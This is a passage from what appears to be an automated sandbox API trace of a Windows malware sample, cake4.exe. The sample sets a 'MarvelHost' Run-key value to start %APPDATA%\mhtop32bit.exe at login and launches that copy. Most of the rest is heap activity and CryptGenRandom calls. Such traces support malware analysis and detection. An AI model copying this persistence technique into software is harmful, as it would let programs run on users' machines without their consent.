lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x4af724 | out: phkResult=0x4af724*=0xfc) returned 0x0 [0063.672] lstrcatA (in: lpString1="", lpString2="\"%APPDATA%\\" | out: lpString1="\"%APPDATA%\\") returned="\"%APPDATA%\\" [0063.672] RtlTryEnterCriticalSection (CriticalSection=0x28e05c) returned 1 [0063.672] lstrcatA (in: lpString1="\"%APPDATA%\\", lpString2="mhtop32bit.exe" | out: lpString1="\"%APPDATA%\\mhtop32bit.exe") returned="\"%APPDATA%\\mhtop32bit.exe" [0063.673] lstrcatA (in: lpString1="\"%APPDATA%\\mhtop32bit.exe", lpString2="\"" | out: lpString1="\"%APPDATA%\\mhtop32bit.exe\"") returned="\"%APPDATA%\\mhtop32bit.exe\"" [0063.673] RegSetValueExW (in: hKey=0xfc, lpValueName="MarvelHost", Reserved=0x0, dwType=0x1, lpData="┢偁䑐呁╁浜瑨灯㈳楢⹴硥≥", cbData=0x104 | out: lpData="┢偁䑐呁╁浜瑨灯㈳楢⹴硥≥") returned 0x0 [0063.674] RegCloseKey (hKey=0xfc) returned 0x0 [0063.674] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x4af720 | out: phkResult=0x4af720*=0xfc) returned 0x0 [0063.674] RegSetValueExW (in: hKey=0xfc, lpValueName="MarvelHost", Reserved=0x0, dwType=0x1, lpData="┢偁䑐呁╁浜瑨灯㈳楢⹴硥≥", cbData=0x104 | out: lpData="┢偁䑐呁╁浜瑨灯㈳楢⹴硥≥") returned 0x0 [0063.675] RegCloseKey (hKey=0xfc) returned 0x0 [0063.675] GetCurrentThread () returned 0xfffffffe [0063.675] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x3e8) returned 0x102 [0065.287] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x7277e8 [0065.437] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x727800, nSize=0xffff | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0065.437] RtlTryEnterCriticalSection (CriticalSection=0x28e05c) returned 1 [0065.437] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4af5b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4af5fc | out: lpCommandLine="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", lpProcessInformation=0x4af5fc*(hProcess=0x26c, hThread=0x12c, dwProcessId=0xac4, dwThreadId=0x7b8)) returned 1 [0077.502] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7277e8 | out: hHeap=0x6d0000) returned 1 [0077.502] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9368 | out: hHeap=0x6d0000) returned 1 [0077.502] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x260) returned 0x703e78 [0077.502] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x703e78, nSize=0x12c | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cake4.exe")) returned 0x2f [0077.502] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f5700 [0077.502] RtlTryEnterCriticalSection (CriticalSection=0x28e05c) returned 1 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7058 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x713158 [0077.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7058 | out: hHeap=0x6d0000) returned 1 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x7132a0 [0077.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713158 | out: hHeap=0x6d0000) returned 1 [0077.503] RtlTryEnterCriticalSection (CriticalSection=0x28e05c) returned 1 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x78) returned 0x6e1568 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709f08 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x702448 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x7024f0 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x7025d0 [0077.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709f08 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x703200 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x715010 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x713158 [0077.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x48) returned 0x6fecc0 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x715718 [0077.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715010 | out: hHeap=0x6d0000) returned 1 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x715770 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x703868 [0077.503] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fecc0 | out: hHeap=0x6d0000) returned 1 [0077.503] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x7277e8 [0077.504] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x727800, nSize=0xffff | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6e94a0 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f1e78 [0077.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715770 | out: hHeap=0x6d0000) returned 1 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x715770 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6e9508 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd8) returned 0x725de0 [0077.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f1e78 | out: hHeap=0x6d0000) returned 1 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f1e78 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f1ed0 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x7219d0 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x138) returned 0x705a68 [0077.504] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x725de0 | out: hHeap=0x6d0000) returned 1 [0077.504] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6810 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6868 [0077.505] GetEnvironmentVariableW (in: lpName="SYSTEMDRIVE", lpBuffer=0x4af524, nSize=0x32 | out: lpBuffer="C:") returned 0x2 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713898 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713988 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c8) returned 0x6edf10 [0077.505] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713c58 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x715010 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713ca8 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x715048 [0077.505] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7277e8 | out: hHeap=0x6d0000) returned 1 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1d4e3) returned 0x7277e8 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x709810 [0077.505] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713c08 [0077.505] CryptAcquireContextA (in: phProv=0x4af498, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x4af498*=0x721a28) returned 1 [0077.751] RtlWakeAllConditionVariable () returned 0x0 [0077.751] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5710 [0077.751] CryptAcquireContextA (in: phProv=0x6f5710, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x6f5710*=0x707338) returned 1 [0077.752] CryptGenRandom (in: hProv=0x707338, dwLen=0x20, pbBuffer=0x713c08 | out: pbBuffer=0x713c08) returned 1 [0077.753] CryptReleaseContext (hProv=0x721a28, dwFlags=0x0) returned 1 [0077.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713c08 | out: hHeap=0x6d0000) returned 1 [0077.753] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713c08 [0077.753] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x120c) returned 0x6fa980 [0077.754] QueryPerformanceCounter (in: lpPerformanceCount=0x4af3f0 | out: lpPerformanceCount=0x4af3f0*=19770911160) returned 1 [0077.754] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.754] GetLastError () returned 0x57 [0077.754] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0077.756] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x4af430 | out: lpSystemTimeAsFileTime=0x4af430*(dwLowDateTime=0x1c8b6a40, dwHighDateTime=0x1d62227)) [0077.756] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0077.756] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709f08 [0077.756] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fa8 [0077.756] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5720 [0077.757] GetLastError () returned 0x7e [0077.757] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0077.757] SetLastError (dwErrCode=0x7e) [0077.757] GetLastError () returned 0x7e [0077.757] SetLastError (dwErrCode=0x7e) [0077.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0077.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0077.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0077.757] GetLastError () returned 0x7e [0077.757] SetLastError (dwErrCode=0x7e) [0077.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0077.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0077.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x7073c0 [0077.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713cd0 [0077.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x71f9f0 [0077.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f5760 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713cf8 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x714188 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f5750 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713d20 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x714170 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6e9368 [0077.758] GetLastError () returned 0x7e [0077.758] SetLastError (dwErrCode=0x7e) [0077.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713d70 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713d98 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f56f0 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5740 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f56e0 [0077.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5740 | out: hHeap=0x6d0000) returned 1 [0077.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f5740 [0077.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f56e0 | out: hHeap=0x6d0000) returned 1 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f56f0 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f56f0 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x7141b8 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f56f0 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x714350 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7141b8 | out: hHeap=0x6d0000) returned 1 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5740 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x7141b8 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x714338 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7141b8 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x7141b8 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714338 | out: hHeap=0x6d0000) returned 1 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714350 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x714350 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fa8 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714350 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709f08 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7141b8 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fa8 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713dc0 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0077.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fa8 [0077.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713dc0 | out: hHeap=0x6d0000) returned 1 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709f08 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x714438 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713dc0 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714438 | out: hHeap=0x6d0000) returned 1 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f5740 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x7141b8 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5740 | out: hHeap=0x6d0000) returned 1 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x714350 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7141b8 | out: hHeap=0x6d0000) returned 1 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fa8 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714350 | out: hHeap=0x6d0000) returned 1 [0077.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x714438 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714438 | out: hHeap=0x6d0000) returned 1 [0077.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713dc0 | out: hHeap=0x6d0000) returned 1 [0077.760] RtlWakeAllConditionVariable () returned 0x0 [0077.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d70 | out: hHeap=0x6d0000) returned 1 [0077.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f5ec8 [0077.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f9f0 | out: hHeap=0x6d0000) returned 1 [0077.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713cd0 | out: hHeap=0x6d0000) returned 1 [0077.761] RtlInitializeConditionVariable () returned 0x28e0fc [0077.761] RtlWakeAllConditionVariable () returned 0x0 [0077.761] GetCurrentThreadId () returned 0x598 [0077.761] GetCurrentThreadId () returned 0x598 [0077.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5740 [0077.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x705a68 [0077.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x705a68 [0077.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703920 [0077.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703920 | out: hHeap=0x6d0000) returned 1 [0077.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x71f9f0 [0077.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x705a68 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x705a68 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x705a68 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703920 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703920 | out: hHeap=0x6d0000) returned 1 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x703920 [0077.762] QueryPerformanceCounter (in: lpPerformanceCount=0x4af210 | out: lpPerformanceCount=0x4af210*=19771722503) returned 1 [0077.762] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x4af250 | out: lpSystemTimeAsFileTime=0x4af250*(dwLowDateTime=0x1c8b6a40, dwHighDateTime=0x1d62227)) [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f56f0 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713cd0 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fa8 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713cd0 | out: hHeap=0x6d0000) returned 1 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x713cd0 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fa8 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713cd0 | out: hHeap=0x6d0000) returned 1 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f56f0 | out: hHeap=0x6d0000) returned 1 [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703920 | out: hHeap=0x6d0000) returned 1 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0077.762] GetLastError () returned 0x7e [0077.762] SetLastError (dwErrCode=0x7e) [0077.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0077.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703920 [0077.763] RtlWakeAllConditionVariable () returned 0x0 [0077.763] RtlWakeAllConditionVariable () returned 0x0 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fa8 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713cd0 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70a9c8 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6edb90 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713d70 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713dc0 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f36d0 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f77f8 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713de8 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6f7918 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x513) returned 0x6f3a40 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x721c20 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x71b500 [0077.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x71b728 [0077.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b500 | out: hHeap=0x6d0000) returned 1 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e10 [0077.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e38 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713e10 | out: hHeap=0x6d0000) returned 1 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x721c20 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713e38 | out: hHeap=0x6d0000) returned 1 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x71b500 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x52b) returned 0x6f45b8 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b500 | out: hHeap=0x6d0000) returned 1 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b728 | out: hHeap=0x6d0000) returned 1 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x714350 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b48 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e38 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e10 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e60 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e88 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713e10 | out: hHeap=0x6d0000) returned 1 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 